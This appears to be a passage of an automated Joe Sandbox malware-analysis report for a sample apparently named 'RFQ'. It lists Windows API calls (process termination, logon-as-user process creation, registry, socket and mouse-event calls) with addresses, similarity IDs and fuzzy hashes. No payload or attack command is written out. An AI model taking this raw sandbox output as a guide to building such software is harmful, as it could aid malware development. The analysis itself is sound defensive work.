                                                                            APIs
                                                                              • Part of subcall function 006EDCFE: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006ECE40,?), ref: 006EDD1B
                                                                              • Part of subcall function 006EDCFE: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006ECE40,?), ref: 006EDD34
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 006ECE63
                                                                            • MoveFileW.KERNEL32(?,?), ref: 006ECE9D
                                                                            • _wcslen.LIBCMT ref: 006ECF23
                                                                            • _wcslen.LIBCMT ref: 006ECF39
                                                                            • SHFileOperationW.SHELL32(?), ref: 006ECF7F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                            • String ID: \*.*
                                                                            • API String ID: 3164238972-1173974218
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00712D4F
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00712D82
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00712DB7
                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00712DE9
                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00712E13
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00712E24
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00712E3E
                                                                            Similarity
                                                                            • API ID: LongWindow$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 2178440468-0
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006E76BF
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006E76E5
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 006E76E8
                                                                            • SysAllocString.OLEAUT32(?), ref: 006E7706
                                                                            • SysFreeString.OLEAUT32(?), ref: 006E770F
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 006E7734
                                                                            • SysAllocString.OLEAUT32(?), ref: 006E7742
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006E7798
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006E77BE
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 006E77C1
                                                                            • SysAllocString.OLEAUT32 ref: 006E77E2
                                                                            • SysFreeString.OLEAUT32 ref: 006E77EB
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 006E7805
                                                                            • SysAllocString.OLEAUT32(?), ref: 006E7813
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 006F0410
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006F044C
                                                                            Similarity
                                                                            • API ID: CreateHandlePipe
                                                                            • String ID: nul
                                                                            • API String ID: 1424370930-2873401336
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 006F04E4
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006F051F
                                                                            Similarity
                                                                            • API ID: CreateHandlePipe
                                                                            • String ID: nul
                                                                            • API String ID: 1424370930-2873401336
                                                                            APIs
                                                                              • Part of subcall function 006BD743: _free.LIBCMT ref: 006BD76C
                                                                            • _free.LIBCMT ref: 006BD7CD
                                                                              • Part of subcall function 006B2958: RtlFreeHeap.NTDLL(00000000,00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000), ref: 006B296E
                                                                              • Part of subcall function 006B2958: GetLastError.KERNEL32(00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000,00000000), ref: 006B2980
                                                                            • _free.LIBCMT ref: 006BD7D8
                                                                            • _free.LIBCMT ref: 006BD7E3
                                                                            • _free.LIBCMT ref: 006BD837
                                                                            • _free.LIBCMT ref: 006BD842
                                                                            • _free.LIBCMT ref: 006BD84D
                                                                            • _free.LIBCMT ref: 006BD858
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID: YVn
                                                                            • API String ID: 2931989736-3670506144
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 006ED992
                                                                            • LoadStringW.USER32(00000000), ref: 006ED999
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 006ED9AF
                                                                            • LoadStringW.USER32(00000000), ref: 006ED9B6
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006ED9FA
                                                                            Strings
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 006ED9D7
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message
                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                            • API String ID: 4072794657-3128320259
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 006F0899
                                                                            • EnterCriticalSection.KERNEL32(00000000,?), ref: 006F08AB
                                                                            • TerminateThread.KERNEL32(00000000,000001F6), ref: 006F08B9
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 006F08C7
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006F08D6
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 006F08E6
                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 006F08ED
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3495660284-0
                                                                            APIs
                                                                            • __allrem.LIBCMT ref: 006B004A
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B0066
                                                                            • __allrem.LIBCMT ref: 006B007D
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B009B
                                                                            • __allrem.LIBCMT ref: 006B00B2
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B00D0
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                            • String ID:
                                                                            • API String ID: 1992179935-0
                                                                            • Opcode ID: f34cbcdfc8d62fc6f68ef1ef0b42743a3754587d6c921e2558e517bac15b21f9
                                                                            • Instruction ID: 3a202ef306098e127062c00c4f7fd727913a0cc60ffac489b1a2ae05bd0d7ecb
                                                                            • Opcode Fuzzy Hash: f34cbcdfc8d62fc6f68ef1ef0b42743a3754587d6c921e2558e517bac15b21f9
                                                                            • Instruction Fuzzy Hash: A181B6B2A007069EE724AFA8CC41BEB77EADF46364F14413DF511D6281EB70DD818B59
                                                                            APIs
                                                                              • Part of subcall function 00703070: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00700F43,00000000,?,?,00000000), ref: 007030BC
                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00701CE7
                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00701D08
                                                                            • WSAGetLastError.WSOCK32 ref: 00701D19
                                                                            • inet_ntoa.WSOCK32(?), ref: 00701DB3
                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 00701E02
                                                                            • _strlen.LIBCMT ref: 00701E5C
                                                                              • Part of subcall function 006E3930: _strlen.LIBCMT ref: 006E393A
                                                                              • Part of subcall function 00688725: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0069D6D4,?,?,?), ref: 00688741
                                                                              • Part of subcall function 00688725: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0069D6D4,?,?,?), ref: 00688774
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                            • String ID:
                                                                            • API String ID: 1923757996-0
                                                                            • Opcode ID: 0c6209beafaee097b8e09398d6530219693b77925af86102c7109857f22fc3d4
                                                                            • Instruction ID: 79145d37491802db25e4206185fb080da7d896841cc6a4e7f170a354d9ac8429
                                                                            • Opcode Fuzzy Hash: 0c6209beafaee097b8e09398d6530219693b77925af86102c7109857f22fc3d4
                                                                            • Instruction Fuzzy Hash: 79A1F171204340EFD310EF24C895E2A7BEAAF84318FA48A4CF4564B2E2DB75ED45CB91
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,006A8269,006A8269,?,?,?,006B63DF,00000001,00000001,8BE85006), ref: 006B61E8
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,006B63DF,00000001,00000001,8BE85006,?,?,?), ref: 006B626E
                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 006B6368
                                                                            • __freea.LIBCMT ref: 006B6375
                                                                              • Part of subcall function 006B37B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,0069FD75,?,?,0068B63D,00000000,?,?,?,006F106C,0071D0D0,?,006C242E), ref: 006B37E2
                                                                            • __freea.LIBCMT ref: 006B637E
                                                                            • __freea.LIBCMT ref: 006B63A3
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1414292761-0
                                                                            • Opcode ID: d807db61a754796f38bb4c5f42c0a07f7c7110040f4894229b5bc7653ef0f61e
                                                                            • Instruction ID: ba60a19b017140414c9963c982c42468ab1077cf731a52c5f9210142eeb713a0
                                                                            • Opcode Fuzzy Hash: d807db61a754796f38bb4c5f42c0a07f7c7110040f4894229b5bc7653ef0f61e
                                                                            • Instruction Fuzzy Hash: 5651BFB2600216ABEB258F64CC81EFF77EBEB45750B154628F905DA251EB38DD808794
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 0070C8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0070B5D5,?,?), ref: 0070C8DC
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C918
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C98F
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C9C5
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0070BBF1
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0070BC4C
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0070BC91
                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0070BCC0
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0070BD1A
                                                                            • RegCloseKey.ADVAPI32(?), ref: 0070BD26
                                                                            Similarity
                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                            • String ID:
                                                                            • API String ID: 1120388591-0
                                                                            • Opcode ID: 79d587f9d294cff37be710294dd800f4af5435971f3272e99e6d6abff46c553d
                                                                            • Instruction ID: b9ec14a4437afa0fbd1160a4e2f5b03f678d2945021d4051a1adbccd0fd956ae
                                                                            • Opcode Fuzzy Hash: 79d587f9d294cff37be710294dd800f4af5435971f3272e99e6d6abff46c553d
                                                                            • Instruction Fuzzy Hash: 8F818F70208241EFD754EF64C895E2ABBE5FF84308F148A5CF4594B2A2DB35EE45CB92
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(00000035), ref: 006DF6A2
                                                                            • SysAllocString.OLEAUT32(?), ref: 006DF749
                                                                            • VariantCopy.OLEAUT32(006DF94D,00000000), ref: 006DF772
                                                                            • VariantClear.OLEAUT32(006DF94D), ref: 006DF796
                                                                            • VariantCopy.OLEAUT32(006DF94D,00000000), ref: 006DF79A
                                                                            • VariantClear.OLEAUT32(?), ref: 006DF7A4
                                                                            Similarity
                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                            • String ID:
                                                                            • API String ID: 3859894641-0
                                                                            • Opcode ID: 2afb4a8f3a00d48e71d3b41b587414e30b1cdd6d0fd9d14e274b33e6fa582380
                                                                            • Instruction ID: 7633e66757874f7e7b52055580c89c5ece94e1504739a978cbd565dd3aeadc94
                                                                            • Opcode Fuzzy Hash: 2afb4a8f3a00d48e71d3b41b587414e30b1cdd6d0fd9d14e274b33e6fa582380
                                                                            • Instruction Fuzzy Hash: 7051E831D00310EADF546B64E895A69B3AAEF49710F24847BE907EF3A1DB708841D79A
                                                                            APIs
                                                                              • Part of subcall function 00688FA0: _wcslen.LIBCMT ref: 00688FA5
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 006F9403
                                                                            • _wcslen.LIBCMT ref: 006F9424
                                                                            • _wcslen.LIBCMT ref: 006F944B
                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 006F94A3
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _wcslen$FileName$OpenSave
                                                                            • String ID: X
                                                                            • API String ID: 83654149-3081909835
                                                                            • Opcode ID: baf660cd321042fc21baa09be5041a01d571e1baf2740107d24f2758e10aeb67
                                                                            • Instruction ID: 249722d2095f68a4cd19efa28df92bc88fe9ba1f6eb70ca8ee22a8276e4b6bcf
                                                                            • Opcode Fuzzy Hash: baf660cd321042fc21baa09be5041a01d571e1baf2740107d24f2758e10aeb67
                                                                            • Instruction Fuzzy Hash: 81E1B0315043449FC764EF24C895BAAB7E2BF85310F04866DFA899B392DB70DD05CBA6
                                                                            APIs
                                                                              • Part of subcall function 0069B021: GetWindowLongW.USER32(?,000000EB), ref: 0069B032
                                                                            • BeginPaint.USER32(?,?,?), ref: 0069A6C7
                                                                            • GetWindowRect.USER32(?,?), ref: 0069A72B
                                                                            • ScreenToClient.USER32(?,?), ref: 0069A748
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0069A759
                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 0069A7A7
                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 006D7BA7
                                                                              • Part of subcall function 0069A7BF: BeginPath.GDI32(00000000), ref: 0069A7DD
                                                                            Similarity
                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                            • String ID:
                                                                            • API String ID: 3050599898-0
                                                                            • Opcode ID: 3bb0dcad4ed4254f844e439b5fef90f5a80b14a60a2801035758ebe6317457c5
                                                                            • Instruction ID: 331bfe202bbf68f725bb6296ccfd6fe16ff6b247d901815d5d9db7c5adb3a89a
                                                                            • Opcode Fuzzy Hash: 3bb0dcad4ed4254f844e439b5fef90f5a80b14a60a2801035758ebe6317457c5
                                                                            • Instruction Fuzzy Hash: 2C41E170504300AFDB11DFA8C884FFA7BFAEB45321F144629F9548B2A1D774A845DBA6
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 006F072A
                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 006F0765
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 006F0781
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 006F07FA
                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 006F0811
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 006F083F
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 3368777196-0
                                                                            • Opcode ID: a2154b40613dcfcae6ad01a6732b01e66f1a04f0491e4dea32e44beac19a3e6a
                                                                            • Instruction ID: 0490fd322c87b64b48230f0f5b8bcc95aae86b8abd3536fe1a6ea0864b9ad233
                                                                            • Opcode Fuzzy Hash: a2154b40613dcfcae6ad01a6732b01e66f1a04f0491e4dea32e44beac19a3e6a
                                                                            • Instruction Fuzzy Hash: BC416071900208EFEF05AF94DC85AAA7779FF44310F1480B9EE009A297D734EE55DBA4
                                                                            APIs
                                                                            • ShowWindow.USER32(?,00000000,?,?,?,?,006D767D), ref: 0071813E
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00718164
                                                                            • ShowWindow.USER32(?,00000000,?,?,?,?,006D767D), ref: 007181C3
                                                                            • ShowWindow.USER32(00000000,00000004,?,?,?,?,006D767D), ref: 007181D7
                                                                            • EnableWindow.USER32(00000000,00000001), ref: 007181FD
                                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00718221
                                                                            Similarity
                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 642888154-0
                                                                            • Opcode ID: 84244d117d65fb3a7c2091aca93d6a2e7cb09e9c14aa373a4b3d39454d7e44d4
                                                                            • Instruction ID: bcc7c58b04ec58af724553cf3f79a495c1efb1564f357cf9b2a3ef9c699b3893
                                                                            • Opcode Fuzzy Hash: 84244d117d65fb3a7c2091aca93d6a2e7cb09e9c14aa373a4b3d39454d7e44d4
                                                                            • Instruction Fuzzy Hash: BB41A831601244EFDB52CF1CC899BE57BE1FB49315F1880A9E5584B1F2C7BA6C86CB41
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 0070220F
                                                                              • Part of subcall function 006FE40C: GetWindowRect.USER32(?,?), ref: 006FE424
                                                                            • GetDesktopWindow.USER32 ref: 00702239
                                                                            • GetWindowRect.USER32(00000000), ref: 00702240
                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 0070227C
                                                                            • GetCursorPos.USER32(?), ref: 007022A8
                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00702306
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                            • String ID:
                                                                            • API String ID: 2387181109-0
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 006E4BEB
                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006E4C08
                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006E4C40
                                                                            • _wcslen.LIBCMT ref: 006E4C5E
                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 006E4C66
                                                                            • _wcsstr.LIBVCRUNTIME ref: 006E4C70
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                            • String ID:
                                                                            • API String ID: 72514467-0
                                                                            APIs
                                                                              • Part of subcall function 0068592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00685922,?,?,006848AA,?,?,?,00000000), ref: 0068594D
                                                                            • _wcslen.LIBCMT ref: 006F5799
                                                                            • CoInitialize.OLE32(00000000), ref: 006F58B3
                                                                            • CoCreateInstance.OLE32(0071FD14,00000000,00000001,0071FB84,?), ref: 006F58CC
                                                                            • CoUninitialize.OLE32 ref: 006F58EA
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                            • String ID: .lnk
                                                                            • API String ID: 3172280962-24824748
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00717BD5
                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00717BFA
                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00717C12
                                                                            • GetSystemMetrics.USER32(00000004), ref: 00717C3B
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,006FB6CB,00000000), ref: 00717C5B
                                                                              • Part of subcall function 0069B021: GetWindowLongW.USER32(?,000000EB), ref: 0069B032
                                                                            • GetSystemMetrics.USER32(00000004), ref: 00717C46
                                                                            Similarity
                                                                            • API ID: Window$Long$MetricsSystem
                                                                            • String ID:
                                                                            • API String ID: 2294984445-0
                                                                            APIs
                                                                              • Part of subcall function 006E0EF8: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006E0F0E
                                                                              • Part of subcall function 006E0EF8: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006E0F1A
                                                                              • Part of subcall function 006E0EF8: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006E0F29
                                                                              • Part of subcall function 006E0EF8: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006E0F30
                                                                              • Part of subcall function 006E0EF8: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006E0F46
                                                                            • GetLengthSid.ADVAPI32(?,00000000,006E1279), ref: 006E16F2
                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 006E16FE
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 006E1705
                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 006E171E
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,006E1279), ref: 006E1732
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E1739
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                            • String ID:
                                                                            • API String ID: 3008561057-0
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006E1443
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 006E144A
                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006E1459
                                                                            • CloseHandle.KERNEL32(00000004), ref: 006E1464
                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006E1493
                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 006E14A7
                                                                            Similarity
                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 1413079979-0
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,006A3309,006A2F75), ref: 006A3320
                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006A332E
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006A3347
                                                                            • SetLastError.KERNEL32(00000000,?,006A3309,006A2F75), ref: 006A3399
                                                                            Similarity
                                                                            • API ID: ErrorLastValue___vcrt_
                                                                            • String ID:
                                                                            • API String ID: 3852720340-0
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,006A4973,?,?,?,006A6502,?,?,?,?), ref: 006B2D08
                                                                            • _free.LIBCMT ref: 006B2D3B
                                                                            • _free.LIBCMT ref: 006B2D63
                                                                            • SetLastError.KERNEL32(00000000,?,?,?), ref: 006B2D70
                                                                            • SetLastError.KERNEL32(00000000,?,?,?), ref: 006B2D7C
                                                                            • _abort.LIBCMT ref: 006B2D82
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free$_abort
                                                                            • String ID:
                                                                            • API String ID: 3160817290-0
                                                                            APIs
                                                                              • Part of subcall function 0069AABF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0069AB19
                                                                              • Part of subcall function 0069AABF: SelectObject.GDI32(?,00000000), ref: 0069AB28
                                                                              • Part of subcall function 0069AABF: BeginPath.GDI32(?), ref: 0069AB3F
                                                                              • Part of subcall function 0069AABF: SelectObject.GDI32(?,00000000), ref: 0069AB68
                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00718940
                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 00718954
                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00718962
                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 00718972
                                                                            • EndPath.GDI32(?), ref: 00718982
                                                                            • StrokePath.GDI32(?), ref: 00718992
                                                                            Similarity
                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                            • String ID:
                                                                            • API String ID: 43455801-0
APIs
• GetDC.USER32(00000000), ref: 006E516E
• GetDeviceCaps.GDI32(00000000,00000058), ref: 006E517F
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 006E5186
• ReleaseDC.USER32(00000000,00000000), ref: 006E518E
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 006E51A5
• MulDiv.KERNEL32(000009EC,00000001,?), ref: 006E51B7
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 006834FF
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00683507
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00683512
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 0068351D
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00683525
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0068352D
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006EEA4E
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006EEA64
• GetWindowThreadProcessId.USER32(?,?), ref: 006EEA73
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006EEA82
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006EEA8C
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006EEA93
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 006E17C3
• UnloadUserProfile.USERENV(?,?), ref: 006E17CF
• CloseHandle.KERNEL32(?), ref: 006E17D8
• CloseHandle.KERNEL32(?), ref: 006E17E0
• GetProcessHeap.KERNEL32(00000000,?), ref: 006E17E9
• HeapFree.KERNEL32(00000000), ref: 006E17F0
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
APIs
  • Part of subcall function 00688FA0: _wcslen.LIBCMT ref: 00688FA5
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006EC60C
• _wcslen.LIBCMT ref: 006EC653
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006EC6BA
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 006EC6E8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
Similarity
• API ID: ItemMenu$Info_wcslen$Default
• String ID: 0
• API String ID: 1227352736-4108050209
APIs
• ShellExecuteExW.SHELL32(0000003C), ref: 0070ADCA
  • Part of subcall function 00688FA0: _wcslen.LIBCMT ref: 00688FA5
